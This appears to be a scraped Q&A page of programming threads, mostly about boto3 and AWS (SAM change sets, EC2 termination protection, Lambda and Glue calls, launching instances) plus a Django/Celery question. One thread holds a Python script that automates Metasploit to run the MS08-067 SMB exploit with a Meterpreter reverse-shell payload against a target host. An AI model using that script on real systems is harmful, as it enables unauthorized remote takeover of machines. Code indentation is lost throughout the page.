How to deploy SAM template using boto3 - aws-lambda

I am trying to deploy
https://s3.amazonaws.com/serverless-chatbot-code/chatbot.yaml
using boto3 library function create_stack but getting an error
"CreateStack cannot be used with templates containing Transforms"
How can I deploy this stack with boto3?
Thanks.

The comment is correct, you have to first create a change set and then execute the change set after change set creation is complete. Code outline is given below
client = boto3.client('cloudformation')
# Helper function to retrieve change set status
def changeSetStatus(change_set_name, client):
response = client.describe_change_set(
ChangeSetName=change_set_name,
)
return response['Status']
# Create change set
cs_response = client.create_change_set(
StackName=stackname,
TemplateURL=templateurl,
Parameters=params,
Capabilities=[capabilities],
ChangeSetType="CREATE",
ChangeSetName=stackname + "-cs"
)
#Remove print statements, here for illustration
print(str(cs_response))
change_set_name = cs_response['Id']
# Wait until change set status is CREATE_COMPLETE
while True:
response = change_set_status(change_set_name, client)
print(str(response))
time.sleep(10)
if response == 'CREATE_COMPLETE':
break
# Execute change set
ex_response = client.execute_change_set(
ChangeSetName=change_set_name
)

I think you should use Waiter instead of while loop like below;
from pprint import pprint
client = boto3.client('cloudformation')
change_set_name = stack_name + "-cs"
# Create change set
cs_response = client.create_change_set(
StackName=stack_name,
TemplateURL=templateurl,
Parameters=params,
Capabilities=[capabilities],
ChangeSetType="CREATE",
ChangeSetName=change_set_name
)
waiter = client.get_waiter('change_set_create_complete')
waiter.wait(
ChangeSetName=change_set_name,
StackName=stack_name,
WaiterConfig={
'Delay': 3,
'MaxAttempts': 50
}
)
desc_response = client.describe_change_set(
ChangeSetName=change_set_name,
StackName=stack_name,
)
print("describe_change_set response Changes:")
pprint(desc_response["Changes"], indent=4)
exec_response = client.execute_change_set(
ChangeSetName=change_set_name,
StackName=stack_name
)
print("execute_change_set Changes:")
pprint(execute_change_set, indent=4)
My work below would be helpful;
https://github.com/LittleWat/cfn-github-action-sample

Related

Turn on All ec2(+ future created ec2) 'termination protection' Using Lambda

Im trying to turn on 'termination protection' for all ec2.
(termination protection doesn't work to spot instance, so i want to add skip condition not to make an error for spot instance.)
I saw a code like below, however the code doesn't work.
import json
import boto3
def lambda_handler(event, context):
client = boto3.client('ec2')
ec2_regions = [region['RegionName'] for region in client.describe_regions()['Regions']]
for region in ec2_regions:
client = boto3.client('ec2', region_name=region)
conn = boto3.resource('ec2',region_name=region)
instances = conn.instances.filter()
for instance in instances:
if instance.state["Name"] == "running":
#print instance.id # , instance.instance_type, region)
terminate_protection=client.describe_instance_attribute(InstanceId =instance.id,Attribute = 'disableApiTermination')
protection_value=(terminate_protection['DisableApiTermination']['Value'])
if protection_value == False:
client.modify_instance_attribute(InstanceId=instance.id,Attribute="disableApiTermination",Value= "True" )
Summary,,,
I want to turn on 'Termination protection' for all EC2 which is running(not spot instance).
The region should be ap-northeast-2.
Could you help me to fix this code to running appropriatly?
if you want to skip the spot instance all you need to do this is figure out which one is spot instance.
You need to use describe_instances api and then using if-else condition, request_id is empty its a spot instance, if not then its not a spot instance
import boto3
ec2 = boto3.resource('ec2')
instances = ec2.instances.filter(Filters=[{'Name': 'instance-state-name', 'Values': ['running']}]) #add filter of your own choice
for instance in instances:
if instance.spot_instance_request_id:
# logic to skip termination ( spot instance )
else:
# logic to terminate ( not spot instance )
You can refer a similar question on this -> https://stackoverflow.com/a/45604396/13126651
docs for describe_instances

Call DRF ViewSet via Celery task

I have a Django Rest Framework ViewSet:
MyModelViewSet(generics.RetrieveUpdateDestroyAPIView):
def perform_destroy(self, instance):
# do something besides deleting the object
Now I'm writing a Celery periodic task that deletes expired objects based on a filter (let's say end_date < now).
I want the task to reuse and perform the same actions that are executed in the ViewSet's perform_destroy method.
Can this be done? How?
Thanks!
You can solve your issue by using Request in DRF, schedule a celery task to call the request. It works well, I've implemented this before.
Example code:
from rest_framework.request import Request as DRFRequest
from django.conf import settings
from django.http import HttpRequest
from your_module.views import MyModelViewSet
CELERY_CACHING_QUEUE = getattr(settings, "CELERY_CACHING_QUEUE", None)
def delete_resource(resource_pk: int) -> None:
"""
This method helps to delete the resource by the id.
"""
print(f'Starting deleting resource {resource_pk}...')
request = HttpRequest()
request.method = 'DELETE'
request.META = {
'SERVER_NAME': settings.ALLOWED_HOSTS[0],
'SERVER_PORT': 443
}
drf_request = DRFRequest(request)
# If your API need user has access permission,
# you should handle for getting the value of
# user_has_access_permission before
# E.g. below
# drf_request.user = user_has_access_permission
try:
view = MyModelViewSet(
kwargs={
'pk': resource_pk
},
request=drf_request
)
view.initial(drf_request)
view.delete(drf_request)
except (Exception, KeyError) as e:
print(f'Cannot delete resource: {resource_pk}, error: {e}')
return
print(f'Finished deleting resource {resource_pk}...')
#task(name="delete_resource_task", queue=CELERY_CACHING_QUEUE)
def delete_resource_task(resource_pk: int) -> None:
"""
Async task helps to delete resource.
"""
delete_resource(resource_pk)

Call a Lambda Function with AWS Glue

Im trying to use boto3 in a job of AWS Glue to call a Lambda Function but without results.
I upload a zip with the libraries:
Like the examples by AWS
and without a zip.
The error is this " Unable to load data for: endpoints".
Im trying to invoke without zip but this go to a timeout exception.
import boto3
client = boto3.client('lambda' , region_name='us-east-1')
r_lambda = client.invoke(FunctionName='S3GlueJson')
Can someone help me ?
In Python, use Boto3 Lambda client 'invoke()'. For example, you can create a Lambda container, then call that from a Glue Job:
import boto3
import pandas as pd
lambda_client = boto3.client('lambda',region_name='us-east-1')
def get_predictions( df ):
# Call getPredictions Lambda container
response = lambda_client.invoke(
FunctionName='getPredictions',
InvocationType='RequestResponse',
LogType='Tail',
Payload=df
)
logger.info('Received response from Lambda container.')
data = response["Payload"].read().decode('utf-8')
x = json.loads(data)
df_pred = pd.DataFrame.from_dict(x)
return df_pred
dfjson = df.to_json()
df_pred = get_predictions( dfjson )
df_pred.head()
If you want to call a Glue Jobs from Lambda Function, can do it like this:
import boto3
glue = boto3.client(service_name='glue', region_name='us-east-1',
endpoint_url='https://glue.us-east-1.amazonaws.com')
#Start Job
myNewJobRun = glue.start_job_run(JobName=JOB_NAME)
#Get current state of Job, to be sure it's running
status = glue.get_job_run(JobName=JOB_NAME, RunId=myNewJobRun['JobRunId'])
logger.info('JOB State {}: {}'.format(
JOB_NAME, status['JobRun']['JobRunState']))
As Job execution can late some time to finish, it's better to don't wait on Lambda function for it to finish.

How to automate Metasploit?

I'm using the following code to automate Metasploit:
import os, msfrpc, optparse, sys, subprocess
from time import sleep
def sploiter(RHOST, LHOST, LPORT, session):
client = msfrpc.Msfrpc({})
client.login('msf', '123')
ress = client.call('console.create')
console_id = ress['id']
RHOST="192.168.1.102"
LPORT="444"
LHOST="127.0.0.1"
commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
"""
print "[+] Exploiting MS08-067 on: "+RHOST
client.call('console.write',[console_id,commands])
res = client.call('console.read',[console_id])
result = res['data'].split('\n')
But it's not working and I'm getting the error:
client.call('console.write',[console_id,commands])
NameError: name 'client' is not defined
What is the problem? Is there any other script that could work in a similar way?
Your indentation is off. So clients.call() is performed outside the context where you create it inside the sploiter function.
Your client only exists inside your sploiter method.
Im not that familiar with python but I think you could adjust the sploiter method so that it returns the client.
client = msfrpc.Msfrpc({})
client.login('msf', '123')
return client
In the part below you could do something like
client = sploiter(Parameter1, Parameter2, Parameter3, Parameter4)
client.call('console.write',[console_id,commands])

How to create EC2 instance through boto python code

requests = [conn.request_spot_instances(price=0.0034, image_id='ami-6989a659', count=1,type='one-time', instance_type='m1.micro')]
I used the following code. But it is not working.
Use the following code to create instance from python command line.
import boto.ec2
conn = boto.ec2.connect_to_region(
"us-west-2",
aws_access_key_id="<aws access key>",
aws_secret_access_key="<aws secret key>",
)
conn = boto.ec2.connect_to_region("us-west-2")
conn.run_instances(
"<ami-image-id>",
key_name="myKey",
instance_type="t2.micro",
security_groups=["your-security-group-here"],
)
To create an EC2 instance using Python on AWS, you need to have "aws_access_key_id_value" and "aws_secret_access_key_value".
You can store such variables in config.properties and write your code in create-ec2-instance.py file
Create a config.properties and save the following code in it.
aws_access_key_id_value='YOUR-ACCESS-KEY-OF-THE-AWS-ACCOUNT'
aws_secret_access_key_value='YOUR-SECRETE-KEY-OF-THE-AWS-ACCOUNT'
region_name_value='region'
ImageId_value = 'ami-id'
MinCount_value = 1
MaxCount_value = 1
InstanceType_value = 't2.micro'
KeyName_value = 'name-of-ssh-key'
Create create-ec2-instance.py and save the following code in it.
import boto3
def getVarFromFile(filename):
import imp
f = open(filename)
global data
data = imp.load_source('data', '', f)
f.close()
getVarFromFile('config.properties')
ec2 = boto3.resource(
'ec2',
aws_access_key_id=data.aws_access_key_id_value,
aws_secret_access_key=data.aws_secret_access_key_value,
region_name=data.region_name_value
)
instance = ec2.create_instances(
ImageId = data.ImageId_value,
MinCount = data.MinCount_value,
MaxCount = data.MaxCount_value,
InstanceType = data.InstanceType_value,
KeyName = data.KeyName_value)
print (instance[0].id)
Use the following command to execute the python code.
python create-ec2-instance.py

Resources